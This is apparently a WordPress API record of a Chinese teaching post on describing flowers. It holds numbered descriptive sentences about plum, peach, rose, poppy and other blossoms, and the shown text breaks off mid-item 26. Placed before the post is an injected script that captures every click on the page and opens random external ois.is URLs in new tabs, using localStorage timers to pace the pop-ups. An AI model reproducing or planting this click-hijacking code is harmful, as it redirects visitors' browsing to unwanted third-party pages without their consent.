<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":1331,"date":"2016-03-18T01:14:10","date_gmt":"2016-03-17T17:14:10","guid":{"rendered":"http:\/\/edu.secda.info\/yujuwu\/?p=1331"},"modified":"2016-03-18T01:14:10","modified_gmt":"2016-03-17T17:14:10","slug":"%e6%a4%8d%e7%89%a9%e7%9a%84%e6%8f%8f%e5%af%ab%ef%bc%9a%e8%8a%b1%e8%8d%89%e6%a8%b9","status":"publish","type":"post","link":"https:\/\/edu.secda.info\/yujuwu\/?p=1331","title":{"rendered":"\u690d\u7269\u7684\u63cf\u5beb\uff1a\u82b1\u8349\u6a39"},"content":{"rendered":"<p style=\"margin: 0cm 36pt 0.0001pt; text-align: center; text-indent: 30.05pt; line-height: 22pt;\" align=\"center\"><b><span style=\"font-size: 15pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u00a0<\/span><\/b><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; text-align: center; text-indent: 30.05pt; line-height: 22pt;\" align=\"center\"><b><span style=\"font-size: 15pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u00a0<\/span><\/b><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; text-align: center; text-indent: 30.05pt; line-height: 22pt;\" align=\"center\"><b><span style=\"font-size: 15pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u690d\u7269\u7684\u63cf\u5beb<\/span><\/b><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt; line-height: 22pt;\"><b><span style=\"font-size: 15pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif; color: #c00000;\">\u82b1<\/span><\/b><b><\/b><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">1.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5c0d\u65bc\u6885\u82b1\uff0c\u6709\u4eba\u611b\u5b83\u60c5\u64cd\u5982\u96ea\uff0c\u6709\u4eba\u611b\u5b83\u5e7d\u9999\u6fc3\u70c8<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\uff0c\u6709\u4eba\u611b\u5b83\u5805\u8c9e\u5982\u9435\u3002\u4f46\u662f\uff0c\u4eba\u5011\u7e3d\u611b\u628a\u5bd2\u6885\uff0c\u96ea\u677e\uff0c\u971c\u7af9\u806f\u5728\u4e00\u8d77\uff0c\u7a31\u70ba\u300c\u6b72\u5bd2\u4e09\u53cb\u300d\uff0c\u800c\u53c8\u7279\u5225\u7d66\u6885\u82b1\u4e00\u500b\u69ae\u8b7d\u7684\u5c01\u8d08\uff0c\u8aaa\u300c\u6885\u5360\u767e\u82b1\u9b41\u300d\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6885\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)\u00a0 <\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">2.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u90a3\u82b1\u767d\u88e1\u900f\u9ec3\uff0c\u9ec3\u88e1\u900f\u7da0\uff0c\u82b1\u74e3\u6f64\u6fa4\u900f\u660e\uff0c\u50cf\u7425\u73c0\u6216\u8005\u7389\u77f3\u96d5\u6210\u7684\uff0c\u5f88\u6709\u9ede\u7389\u6f54\u51b0\u6e05\u7684\u97fb\u81f4\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6885\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)\u00a0 <\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">3.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6885\u82b1\u662f\u51ac\u5929\u6700\u5f8c\u552f\u4e00\u50c5\u5b58\u7684\u82b1\u6735\uff0c\u9084\u662f\u6625\u5929\u65e9\u958b\u653e\u7684\u82b1\u679d\uff1f\u7576\u7a4d\u96ea\u58d3\u65b7\u679d\u982d\u7684\u6642\u5019\uff0c\u767e\u82b1\u51cb\u8b1d\uff0c\u6885\u82b1\u5b83\u8e0f\u8457\u98a8\u96ea\u4f86\u4e86\u3002\u800c\u7576\u51ac\u53bb\u6625\u4f86\uff0c\u842c\u7269\u8607\u9192\uff0c\u767e\u82b1\u6eff\u5712\u7684\u6642\u5019\uff0c\u6885\u82b1\u5b83\u537b\u53c8\u4e00\u4eba\u5148\u53bb\u3002\u662f\u8ffd\u8e64\u98a8\u96ea\u800c\u53bb\u5462\uff0c\u9084\u662f\u628a\u5b83\u5f15\u4f86\u7684\u6625\u5929\u7559\u5728\u4eba\u9593\uff1f<\/span><span style=\"font-size: 11pt;\"> (<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6885\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)\u00a0 <\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">4.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u9019\u4e9b\u6843\u82b1\uff0c\u7d05\u7684\u50cf\u706b\uff0c\u7c89\u7684\u4f3c\u971e\uff0c\u767d\u7684\u5982\u7389\u2026\u2026\u6709\u7684\u4ef0\u81c9\u5fae\u7b11\uff0c\u6709\u7684\u4f4e\u982d\u542b\u7f9e\uff0c\u6709\u7684\u8fce\u98a8\u5f15\u8776\uff0c\u9084\u6709\u7121\u6578\u542b\u82de\u5f85\u653e\u6bb7\u7d05\u6b32\u6ef4\u7684\u82b1\u9aa8\u6735\uff0c\u50cf\u662f\u9811\u76ae\u7684\u5b69\u5b50\u6b63\u6485\u8457\u5c0f\u5634\uff0c\u5411\u59d0\u59d0\u5011\u800d\u5c0f\u813e\u6c23\u3002\u7c89\u7d05\u7684\u6843\u82b1\uff0c\u5c31\u50cf\u5c0f\u59d0\u59d0\u6f02\u4eae\u7684\u9762\u5b54\uff0c\u6625\u5916\u5a46\u7d66\u5979\u5857\u4e86\u4e00\u5c64\u6de1\u6de1\u7684\u80ed\u8102\u3002\u90a3\u5927\u7d05\u7684\uff0c\u53c8\u4e0d\u77e5\u662f\u88ab\u904a\u4eba\u770b\u7f9e\u4e86\uff0c\u9084\u662f\u88ab\u6625\u9152\u704c\u9189\u4e86\uff0c\u4e00\u76f4\u7d05\u5230\u8033\u6735\u6839\uff1b\u90a3\u6f54\u767d\u7684\uff0c\u6070\u4f3c\u4e00\u4f4d\u606c\u975c\u7d14\u60c5\u7684\u5c11\u5973\uff0c\u4ee5\u5176\u4f3c\u96ea\u7684\u6f54\u767d\uff0c\u5438\u5f15\u8457\u773e\u591a\u904a\u4eba\u3002\u6a38\u5be6\u7121\u83ef\uff0c\u96c5\u81f4\u6975\u4e86\uff01<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6843\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">5.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u98af\u98af\u897f\u98a8\u547c\u562f\uff0c\u767e\u82b1\u7686\u6b98\uff0c\u53ea\u898b\u4e00\u62b9\u9ec3\u65bc\u98a8\u4e2d\u98c4\u96f6\u589c\u843d\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u83ca\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">6.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u90a3\u682a\u9ec3\u662f\u79cb\u98a8\u4e2d\u6700\u5c79\u7acb\u4e0d\u6416\u7684\uff0c\u7e41\u82b1\u843d\u76e1\uff0c\u60df\u7368\u4f60\u4f9d\u820a\u4ef0\u5929\u9577\u562f\uff0c\u81ea\u53e4\u9a37\u4eba\u58a8\u5ba2\u7686\u70ba\u4f60\u50be\u5012\uff0c\u90a3\u856d\u745f\u79cb\u98a8\u88e1\uff0c\u53ea\u898b\u4f60\u6063\u610f\u7dbb\u653e\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u83ca\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">) <\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">7.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u7d30\u81a9\u7684\u8449\uff0c\u5982\u7247\u7247\u7da0\u7d17\uff0c\u4f38\u5c55\u7684\u679d\uff0c\u662f\u5973\u5b50\u7d20\u624b\u7e96\u7e96\uff0c\u5c0f\u5c0f\u767d\u82b1\uff0c\u662f\u541b\u898b\u7336\u6190\u7684\u9ede\u9ede\u6dda\u73e0\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6842\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">8.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e00\u4e00\u9ede\u9ede\u3001\u4e00\u7c07\u7c07\u7d30\u7dfb\u800c\u6f54\u767d\uff0c\u50cf\u662f\u5929\u4f7f\u9280\u9234\u4e00\u822c\u7684\u7b11\u8072\uff0c\u4ee4\u6eff\u5929\u661f\u5b50\u4e0b\u51e1\uff0c\u843d\u5728\u82b1\u5712\u7684\u4e00\u9685\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6842\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 44.8pt; text-indent: -8.8pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">9.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5e7d\u5e7d\u7684\u6842\u9999\uff0c\u5f9e\u5c0f\u5df7\u6df1\u8655\u50b3\u4f86\uff0c\u6f2b\u6f36\u5728\u6708\u5149\u4e0b\uff0c\u4e0d\u5f35\u63da\u7684\u82ac\u82b3\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6842\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">10.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u542b\u82de\u5f85\u653e\uff0c\u5728\u6e05\u6668\u7684\u9732\u73e0\u4e0b\u7526\u9192\u3002\u597d\u4e00\u6735\u7f8e\u9e97\uff0c\u6c89\u6d6e\u5728\u8336\u4e0a\u7684\uff0c\u90a3\u80a1\u6e05\u751c\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6842\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">11.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6708\u4e0b\uff0c\u80e1\u7434\u555e\u555e\uff0c\u6842\u5f71\u6591\u99c1\uff0c\u6eff\u6ea2\u51fa\u90a3\u79cb\u591c\u7368\u6709\u7684\u98a8\u9a37\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6842\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">12.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e00\u74e3\u74e3\u6e05\u6f88\u6c81\u4eba\u5fc3\u813e\u7684\u767d\uff0c\u6e05\u9060\u5e7d\u9999\uff0c\u513c\u7136\u4e00\u4f4d\u8b19\u8b19\u541b\u5b50\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6842\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">13.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e00\u5708\u5708\u6de1\u7d2b\u6f23\u6f2a\u5f9e\u4e2d\u6f3e\u958b\uff0c\u74e3\u74e3\u5f35\u8457\u5507\u671d\u8457\u967d\u5149\uff0c\u5316\u4f5c\u90a3\u679d\u982d\u7684\u4e00\u7dbb\u3002<\/span><span style=\"font-size: 11pt;\"> (<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u727d\u725b\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">) <\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">14.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u662f\u6709\u9ede\u5152\u61f6\uff0c\u4f46\u90a3\u53c8\u4f55\u59a8\uff1f\u7e5e\u8457\u652f\u67b6\u4e00\u74b0\u74b0\u5411\u4e0a\u751f\u9577\uff0c\u5979\u53ef\u662f\u5049\u5927\u7684\u97f3\u6a02\u5bb6\u5462\uff01\u633a\u8457\u4eae\u9e97\u7684\u5587\u53ed\uff0c\u594f\u4e00\u66f2\u8f15\u5feb\u7684\u6625\u4e4b\u6b4c\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5587\u53ed\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">15.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u73ab\u7470\u82b1\u9ad8\u50b2\u7684\u62ac\u8d77\u982d\uff0c\u7528\u5b83\u8c54\u9e97\u7684\u7d05\u5411\u4e16\u4eba\u70ab\u8000\uff0c\u7576\u4f60\u8d70\u8fd1\u60f3\u4e00\u89aa\u82b3\u6fa4\uff0c\u537b\u88ab\u5b83\u62ab\u8457\u5c16\u523a\u7684\u8eab\u8ec0\u624e\u51fa\u9bae\u8840\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u73ab\u7470\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">16.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u73ab\u7470\u662f\u4e00\u5c01\u5c01\u6eab\u67d4\u6372\u8d77\u7684\u4fe1\u7b8b\uff0c\u67d3\u4e0a\u6df1\u7d05\u7684\u611b\uff0c\u518d\u7528\u5507\u5c01\u5370\u3002\u63d2\u5728\u5e36\u523a\u7684\u7bad\u77e2\u4e0a\uff0c\u662f\u56c2\u5f35\u7684\u611b\u7684\u5ba3\u8a00\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u73ab\u7470\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">17.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u76db\u653e\u7684\u73ab\u7470\u50b2\u8996\u4e00\u5207\uff0c\u90a3\u8840\u7d05\u7684\u76db\u88dd\u8c54\u5f97\u5feb\u8b93\u4eba\u775c\u4e0d\u958b\u773c\uff0c\u7db4\u5728\u7da0\u53e2\u4e2d\uff0c\u597d\u4e0d\u9bae\u660e\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u73ab\u7470\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">18.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5b64\u50b2\u7684\u7ad9\u5728\u6c34\u908a\u652c\u93e1\u81ea\u8cde\uff0c\u9ad8\u9ad8\u7684\u6602\u8d77\u9a55\u50b2\u7684\u9838\u9805\uff0c\u5373\u4f7f\u98a8\u5439\uff0c\u4ecd\u4e0d\u80af\u5c48\u670d\uff0c\u662d\u544a\u5929\u4e0b\uff0c\u6211\u5c31\u662f\u4e3b\u5bb0\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6c34\u4ed9\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">) <\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">19.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u9b31\u91d1\u9999\u662f\u4e00\u76de\u76de\u9ad8\u8173\u676f\uff0c\u7dbb\u653e\u5728\u671d\u967d\u4e0b\uff0c\u76db\u8457\u6e05\u6668\u7684\u9732\u73e0\uff0c\u5f85\u904a\u4eba\u54c1\u5617\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6c34\u4ed9\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">20.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5b9b\u5982\u4e00\u500b\u500b\u5c0f\u5de7\u559c\u6c23\u7684\u7d05\u8272\u71c8\u7c60\uff0c\u5e36\u8457\u4e00\u80a1\u5929\u771f\uff0c\u8fce\u98a8\u7dbb\u653e\u8457\uff0c\u3002\u53ea\u662f\u8ab0\u4e5f\u4e0d\u77e5\u9053\uff0c\u90a3\u4efd\u751c\u7f8e\u4e0b\u5305\u85cf\u8457\u7684\u7adf\u662f\uff0c\u6700\u8a98\u4eba\u7684\u6bd2\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u7f4c\u7c9f\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">21.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e00\u53e2\u53e2\uff0c\u4e00\u7c07\u7c07\u6bb7\u7d05\u7684\u5b30\u7c9f\uff0c\u4e00\u8def\u58c1\u6817\u525d\u843d\u7684\u76f4\u71d2\u9032\u5c71\u8c37\u76e1\u982d\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6c34\u4ed9\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">22.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e00\u53e2\u4e00\u53e2\u805a\u5408\u6210\u51dc\u7136\u7684\u50b2\u6c23\uff0c\u5728\u5225\u4eba\u7684\u8870\u4ea1\u4e0b\u5e7b\u5316\u6210\u66f4\u9bae\u70c8\u7684\u96c4\u59ff\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u99ac\u7e93\u4e39\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">23.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u90a3\u4e00\u6735\u6735\u675c\u9d51\u82b1\u7684\u82b1\u74e3\u7dcb\u7d05\u5f97\u597d\u4f3c\u4f5b\u6717\u660e\u54e5\u821e\u8005\u7684\u88d9\u896c\uff0c\u6625\u98a8\u62c2\u904e\uff0c\u6de1\u7da0\u8272\u7684\u82b1\u854a\u986b\u52d5\u8457\uff0c\u4e00\u5982\u521d\u6625\u5c11\u5973\u7684\u5fc3\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u675c\u9d51\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">24.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u85b0\u98a8\u8972\u4f86\uff0c\u8f15\u62c2\u4e00\u6c60\u7c89\u5ae9\u5b0c\u854a\uff0c\u65bc\u7fe0\u7da0\u5713\u84cb\u4e0a\u66f3\u66f3\u751f\u59ff\uff0c\u7db4\u5f97\u6eff\u6c60\u751f\u610f<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u76ce\u7136\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u8377\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">25.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u8277\u7d05\u5982\u706b\u92ea\u84cb\u4e86\u9ed1\u8272\u7684\u5927\u5730\uff0c\u4e00\u74e3\u74e3\u7e96\u7d30\u62bd\u9577\u7684\u82b1\u689d\u5782\u639b\u6c34\u908a\uff0c\u4ee5\u54c0\u50b7\u53c8\u7f8e\u9e97\u7684\u8840\u8272\u52fe\u4f4f\u4e86\u8ff7\u5931\u7684\u9b42\uff0c\u8cdc\u4e88\u4ed6\u5011\u65b0\u751f\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5f7c\u5cb8\u82b1\uff0f\u4e09\u5b5d\u6578<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">26.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, 